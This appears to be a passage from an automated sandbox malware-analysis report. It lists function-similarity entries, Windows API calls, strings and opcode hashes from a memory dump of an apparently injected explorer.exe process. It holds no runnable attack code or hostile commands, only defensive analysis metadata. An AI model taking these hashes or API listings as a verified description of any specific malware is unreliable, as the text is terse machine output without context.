                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: *?
                                                  • API String ID: 269201875-2564092906
                                                  • Opcode ID: aeec70a4035a5f63885e5f6ab4fcd7669b9cc105364cd78653b6bada5468aec7
                                                  • Instruction ID: 3e053745365665a96b60212342dd98eb4bd9ecf06425d4e345fe5206ac92bcb2
                                                  • Opcode Fuzzy Hash: aeec70a4035a5f63885e5f6ab4fcd7669b9cc105364cd78653b6bada5468aec7
                                                  • Instruction Fuzzy Hash: 5E612FB5D10219AFDF14CFA8D9805EDFBF5EF49710B1881A9D845F7300D6759E818B90
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: CloseHandleclosesocket
                                                  • String ID: 246122658369$ZtF=
                                                  • API String ID: 2025136489-1133631969
                                                  • Opcode ID: fbd2942ba6d24a2ad0b456b962568e9170d66bf32aa28636bcc62b6d7cfc2a18
                                                  • Instruction ID: 1e3da25384a06793355b51f162e841fe236a9edd447effe6e18e3dd6fea57703
                                                  • Opcode Fuzzy Hash: fbd2942ba6d24a2ad0b456b962568e9170d66bf32aa28636bcc62b6d7cfc2a18
                                                  • Instruction Fuzzy Hash: C0315775A20348ABDB04FF68CD4A78DBFA5EB46710F508248F8115B385CB7986C48BC2
                                                  APIs
                                                  • ___std_exception_copy.LIBVCRUNTIME ref: 0320499F
                                                    • Part of subcall function 0322B056: RaiseException.KERNEL32(E06D7363,00000001,00000003,032025DC,03220D37,8B18EC83,?,032025DC,?,032644CC), ref: 0322B0B6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ExceptionRaise___std_exception_copy
                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                  • API String ID: 3109751735-1866435925
                                                  • Opcode ID: f368fbb11440c6fa829d662027ab656a55a327560b5751515337ae4077b37227
                                                  • Instruction ID: 87a1442b63051acf4208c31eade5d6f754aa5ded6c803774ef13fc17c90573f2
                                                  • Opcode Fuzzy Hash: f368fbb11440c6fa829d662027ab656a55a327560b5751515337ae4077b37227
                                                  • Instruction Fuzzy Hash: 921129B15243096FC710EF59D841B96F7E8EF51210F14C52AFDA48B681F770EA98CB51
APIs
Memory Dump Source
• Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
• Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
Similarity
• API ID: _strrchr
• String ID:
• API String ID: 3213747228-0
• Opcode ID: bbdc5413d29c3be440159c633bfa54827fef4cc4fb06d2ce54c7cea705859a06
• Instruction ID: 1076a5e2c084f1e09be041b56a4b3af8a32a60ba624792d0d2f6f34b5ec20762
• Opcode Fuzzy Hash: bbdc5413d29c3be440159c633bfa54827fef4cc4fb06d2ce54c7cea705859a06
• Instruction Fuzzy Hash: E0B157B69246869FDB11CF68C8407EEBBF9EF47300F1881AAD9459B241D3B58DC1CB61
APIs
Memory Dump Source
• Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
• Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
Similarity
• API ID: AdjustPointer
• String ID:
• API String ID: 1740715915-0
• Opcode ID: db34ebc07a566c444457bc11616ae10df66fe2bbc69dc22404b3e649b6e1e046
• Instruction ID: 8fa4008dab2795723f2d476b49c3f24867589083158579f197485ce96688e774
• Opcode Fuzzy Hash: db34ebc07a566c444457bc11616ae10df66fe2bbc69dc22404b3e649b6e1e046
• Instruction Fuzzy Hash: E951BFB6664636BFDB29CF14DC40BAEBBA4EF40610F184529E8055B690DB72A9C0CB90
APIs
• GetVersionExW.KERNEL32(0000011C,?,74D40A26,00000000), ref: 03209A99
• GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 03209B00
• GetProcAddress.KERNEL32(00000000), ref: 03209B07
Memory Dump Source
• Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
• Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
Similarity
• API ID: AddressHandleModuleProcVersion
• String ID:
• API String ID: 3310240892-0
• Opcode ID: 3bc6bc43c0c9aa2853e574b2652e0a52b82248720a9c4d5b3f9ed21ed5b47f34
• Instruction ID: ec029aec0e96fe5eec70d05819d6a8cb7e86c94a992217974c6e7fcfc22d3ba4
• Opcode Fuzzy Hash: 3bc6bc43c0c9aa2853e574b2652e0a52b82248720a9c4d5b3f9ed21ed5b47f34
• Instruction Fuzzy Hash: B1512971D242189FDB14EB68DD497EDFB78EB45320F404298E805AB2D3EB749AC4CB91
APIs
• __Mtx_unlock.LIBCPMT ref: 03225EF7
• std::_Rethrow_future_exception.LIBCPMT ref: 03225F49
• std::_Rethrow_future_exception.LIBCPMT ref: 03225F59
  • Part of subcall function 03203A60: __Mtx_unlock.LIBCPMT ref: 03203B54
Memory Dump Source
• Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
• Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
Similarity
• API ID: Mtx_unlockRethrow_future_exceptionstd::_
• String ID:
• API String ID: 3298230783-0
• Opcode ID: 69afab09253626889d70557a6cc28f8125a91fee356d4c36a80bd22e9d439724
• Instruction ID: 6c8085e655b856aebe07892a04dafe52e8c111b34dd1b2249b615e6bbfc3d7cb
• Opcode Fuzzy Hash: 69afab09253626889d70557a6cc28f8125a91fee356d4c36a80bd22e9d439724
• Instruction Fuzzy Hash: D8412A75D203197BCB14EBA4DC00BAFFFB89F06200F14496EE5429B541EB71A5C8C7A2
APIs
• _free.LIBCMT ref: 0324725E
• _free.LIBCMT ref: 03247287
• SetEndOfFile.KERNEL32(00000000,032439ED,00000000,032373F1,?,?,?,?,?,?,?,032439ED,032373F1,00000000), ref: 032472B9
• GetLastError.KERNEL32(?,?,?,?,?,?,?,032439ED,032373F1,00000000,?,?,?,?,00000000), ref: 032472D5
Memory Dump Source
• Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
• Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
Similarity
• API ID: _free$ErrorFileLast
• String ID:
• API String ID: 1547350101-0
• Opcode ID: e98d0fa75581c66eea0d5ff20040922f850c9784cda4a3ce3cd9c4562c2f38bd
• Instruction ID: d3442a5960a2d5752e856148d618068d6fcd9b4028961c74834fef8befd9375f
• Opcode Fuzzy Hash: e98d0fa75581c66eea0d5ff20040922f850c9784cda4a3ce3cd9c4562c2f38bd
• Instruction Fuzzy Hash: 4341B4BA9347069ADB19EBAC9C40B9D7BB9AF46320F180151F834EB290DBB4D9D04760
Memory Dump Source
• Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
• Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 665c4d60188ea98fafac9484bf989b382783476b05f8f9a755eff0140344adb6
• Instruction ID: 61b7a350c29eab74ca50633b14ec7e514c4971544a69ac1a345fc8f9867277d7
• Opcode Fuzzy Hash: 665c4d60188ea98fafac9484bf989b382783476b05f8f9a755eff0140344adb6
• Instruction Fuzzy Hash: 2441C876A20725BFD724EF38CC41B9ABFA9FB48710F158529F112DF290D6F1A9809780
APIs
Memory Dump Source
• Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
• Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
Similarity
• API ID: Mtx_unlock$Cnd_broadcastCurrentThread
• String ID:
• API String ID: 3264154886-0
• Opcode ID: 130e469144e2b6940d32ad1705d733084e30f932b87ad57cf149aa7ffea3d6f8
• Instruction ID: 71747455eae3d4ba5ba00433bf90348bbc67477c1a50d11c2a359d8d8488c3db
• Opcode Fuzzy Hash: 130e469144e2b6940d32ad1705d733084e30f932b87ad57cf149aa7ffea3d6f8
• Instruction Fuzzy Hash: F041CEB5A11716AFCB11DF24C944B5ABBE8FF08310F04456AE91ACB791EB71E984CBC1
APIs
  • Part of subcall function 0322E958: _free.LIBCMT ref: 0322E966
  • Part of subcall function 0323E45F: WideCharToMultiByte.KERNEL32(00000000,00000000,8B18EC83,?,00000000,8B18EC83,032380F7,0000FDE9,8B18EC83,?,?,?,03237E70,0000FDE9,00000000,?), ref: 0323E50B
• GetLastError.KERNEL32 ref: 0323F01B
• __dosmaperr.LIBCMT ref: 0323F022
• GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0323F061
• __dosmaperr.LIBCMT ref: 0323F068
Memory Dump Source
• Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
• Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
• String ID:
• API String ID: 167067550-0
• Opcode ID: 2661e4f44a4d24657f29006e293448aa1c74c850e76063b13e69729a0833823b
• Instruction ID: 5111cabc2d8616130adb16aa907fa11110e0ee7c36d4f2213ac38e55e922a051
• Opcode Fuzzy Hash: 2661e4f44a4d24657f29006e293448aa1c74c850e76063b13e69729a0833823b
• Instruction Fuzzy Hash: 352106F2A2431ABFDB20EF65AD80D6BB79DEF062A47048154F924DB144D7B1EC9087A0
APIs
• GetLastError.KERNEL32(00000000,00000000,?,03237BB7,?,00000000,00000000,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010), ref: 03236DD5
• _free.LIBCMT ref: 03236E32
• _free.LIBCMT ref: 03236E68
• SetLastError.KERNEL32(00000000,00000006,000000FF,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010,03231112,00000000,00000000,00000000), ref: 03236E73
Memory Dump Source
• Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
• Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
Similarity
• API ID: ErrorLast_free
• String ID:
• API String ID: 2283115069-0
• Opcode ID: 7b5e5012412d901f77cd534ec51af60c01bda80a92e3860572e3bfc8c575eb3a
• Instruction ID: 76b7dfb52533649ae21a3141671725619c14464b3755fe86af54a3b52120b111
• Opcode Fuzzy Hash: 7b5e5012412d901f77cd534ec51af60c01bda80a92e3860572e3bfc8c575eb3a
• Instruction Fuzzy Hash: 3011A7F62313027EDA11F6A4ACC4E2B256D9BC3674B284334F6659E190DEA5CCC94191
APIs
  • Part of subcall function 03227FC9: GetModuleHandleExW.KERNEL32(00000002,00000000,00000000,?,?,0322801B,00000014,?,0322805C,00000014,?,03202D32,00000000,00000014,00000000,74D40A26), ref: 03227FD5
• __Mtx_unlock.LIBCPMT ref: 032280AE
• FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,74D40A26,?,?,?,032488A0,000000FF), ref: 032280D6
• __Mtx_unlock.LIBCPMT ref: 03228111
• __Cnd_broadcast.LIBCPMT ref: 03228122
Memory Dump Source
• Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
• Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
Similarity
• API ID: Mtx_unlock$CallbackCnd_broadcastFreeHandleLibraryModuleReturnsWhen
• String ID:
• API String ID: 420990631-0
• Opcode ID: 6cd743f824108a5c81d384d20d3b868ffa627e3f6a47d41cec1b437bde216dd5
• Instruction ID: 185558b157dd97478a6e0adb1ef7bb1d8043df51c9265997b6be810fded5e969
• Opcode Fuzzy Hash: 6cd743f824108a5c81d384d20d3b868ffa627e3f6a47d41cec1b437bde216dd5
• Instruction Fuzzy Hash: 9B11D67A924720BBCB11FB65AC04B1FBFA8EF44A20F04881EF811D7691DBB5D5C0C651
APIs
• GetLastError.KERNEL32(03220D37,03220D37,8B18EC83,03231267,03238428,?,?,03229DCF,03220D37,?,032233CE,8B18EC84,774D0F00), ref: 03236F2C
• _free.LIBCMT ref: 03236F89
• _free.LIBCMT ref: 03236FBF
• SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,03229DCF,03220D37,?,032233CE,8B18EC84,774D0F00), ref: 03236FCA
Memory Dump Source
• Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
• Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
Similarity
• API ID: ErrorLast_free
• String ID:
• API String ID: 2283115069-0
• Opcode ID: 49613aaeef7f38cc2e7636e0c78840b81a3f73f9be45c29ca4e222fd881ca934
• Instruction ID: 0e1438a8ef638c3e3069f218e1d18d64b8f330fe1e0e54439b8d8ef2e57cd421
• Opcode Fuzzy Hash: 49613aaeef7f38cc2e7636e0c78840b81a3f73f9be45c29ca4e222fd881ca934
• Instruction Fuzzy Hash: BB11C6F62343027ACB11F2A96CC4E2A267E9BC3674B144334F26ADA2D4DEB5CCC94151
APIs
• GetFullPathNameW.KERNEL32(00000020,?,?,00000000,?,00000000,?,03245922,?,?,?,?,00000020,00000001), ref: 03239F1E
• GetLastError.KERNEL32(?,03245922,?,?,?,?,00000020,00000001), ref: 03239F28
• __dosmaperr.LIBCMT ref: 03239F2F
Memory Dump Source
• Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
• Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
Similarity
• API ID: ErrorFullLastNamePath__dosmaperr
• String ID:
• API String ID: 2398240785-0
• Opcode ID: b548502894ded7acd4ff4e6b9e7c52d82dd14e368c1945b36b856315469cf6d9
• Instruction ID: 5c78bf2c68b8350a08a88ba09cba9335c27aaff9c66e9723a66dc88aeb2b7772
• Opcode Fuzzy Hash: b548502894ded7acd4ff4e6b9e7c52d82dd14e368c1945b36b856315469cf6d9
• Instruction Fuzzy Hash: 02F01D76224616BB8F20ABA6D808A9AFF69FF476A13048511F919C6450C7B1E9E1C7D0
APIs
• GetFullPathNameW.KERNEL32(00000020,?,?,00000000,?,00000000,?,03245997,?,?,?,00000020,00000001), ref: 03239EB5
• GetLastError.KERNEL32(?,03245997,?,?,?,00000020,00000001), ref: 03239EBF
• __dosmaperr.LIBCMT ref: 03239EC6
Memory Dump Source
• Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
• Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
Similarity
• API ID: ErrorFullLastNamePath__dosmaperr
• String ID:
• API String ID: 2398240785-0
• Opcode ID: 7e50832f811bad879ed3d5f87e62f307ad070c38e30007b99d21bdb3903ef903
• Instruction ID: e0cbf998c8f34bc09fc07eef13aaa838cc2bb215e6810b0b1b6c13b183f8cfb9
• Opcode Fuzzy Hash: 7e50832f811bad879ed3d5f87e62f307ad070c38e30007b99d21bdb3903ef903
• Instruction Fuzzy Hash: 6BF06276215216BBCF20ABA6D808E86FF6DFF466A03048511F519C7110C7B1E8E1C7D0
                                                  APIs
                                                  • WriteConsoleW.KERNEL32(00000000,00000000,8B18EC83,00000000,00000000,?,03243FE2,00000000,00000001,00000000,00000000,?,03237B46,?,?,00000000), ref: 03247511
                                                  • GetLastError.KERNEL32(?,03243FE2,00000000,00000001,00000000,00000000,?,03237B46,?,?,00000000,?,00000000,?,03238092,8B18EC83), ref: 0324751D
                                                    • Part of subcall function 032474E3: CloseHandle.KERNEL32(FFFFFFFE,0324752D,?,03243FE2,00000000,00000001,00000000,00000000,?,03237B46,?,?,00000000,?,00000000), ref: 032474F3
                                                  • ___initconout.LIBCMT ref: 0324752D
                                                    • Part of subcall function 032474A5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,032474D4,03243FCF,00000000,?,03237B46,?,?,00000000,?), ref: 032474B8
                                                  • WriteConsoleW.KERNEL32(00000000,00000000,8B18EC83,00000000,?,03243FE2,00000000,00000001,00000000,00000000,?,03237B46,?,?,00000000,?), ref: 03247542
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                  • String ID:
                                                  • API String ID: 2744216297-0
                                                  APIs
                                                  • SleepConditionVariableCS.KERNEL32(?,03229B07,00000064,?,03208A41,0326CDC0), ref: 03229B8D
                                                  • LeaveCriticalSection.KERNEL32(03268FA8,0326CDC0,?,03229B07,00000064,?,03208A41,0326CDC0), ref: 03229B97
                                                  • WaitForSingleObjectEx.KERNEL32(0326CDC0,00000000,?,03229B07,00000064,?,03208A41,0326CDC0), ref: 03229BA8
                                                  • EnterCriticalSection.KERNEL32(03268FA8,?,03229B07,00000064,?,03208A41,0326CDC0), ref: 03229BAF
                                                  Similarity
                                                  • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                  • String ID:
                                                  • API String ID: 3269011525-0
                                                  APIs
                                                  • _free.LIBCMT ref: 03234712
                                                    • Part of subcall function 032381B6: HeapFree.KERNEL32(00000000,00000000,?,0324115C,?,00000000,?,8B18EC83,?,032413FF,?,00000007,?,?,032418A4,?), ref: 032381CC
                                                    • Part of subcall function 032381B6: GetLastError.KERNEL32(?,?,0324115C,?,00000000,?,8B18EC83,?,032413FF,?,00000007,?,?,032418A4,?,?), ref: 032381DE
                                                  • _free.LIBCMT ref: 03234725
                                                  • _free.LIBCMT ref: 03234736
                                                  • _free.LIBCMT ref: 03234747
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  APIs
                                                  • __startOneArgErrorHandling.LIBCMT ref: 032334FD
                                                  Strings
                                                  Similarity
                                                  • API ID: ErrorHandling__start
                                                  • String ID: pow
                                                  • API String ID: 3213639722-2276729525
                                                  Strings
                                                  Similarity
                                                  • API ID:
                                                  • String ID: C:\Windows\SysWOW64\explorer.exe
                                                  • API String ID: 0-2751450654
                                                  APIs
                                                  • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0322D0F1
                                                  Strings
                                                  Similarity
                                                  • API ID: EncodePointer
                                                  • String ID: MOC$RCC
                                                  • API String ID: 2118026453-2084237596
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 032044EB
                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0320453A
                                                    • Part of subcall function 0322894E: _Yarn.LIBCPMT ref: 0322896D
                                                    • Part of subcall function 0322894E: _Yarn.LIBCPMT ref: 03228991
                                                  Strings
                                                  Similarity
                                                  • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                  • String ID: bad locale name
                                                  • API String ID: 1908188788-1405518554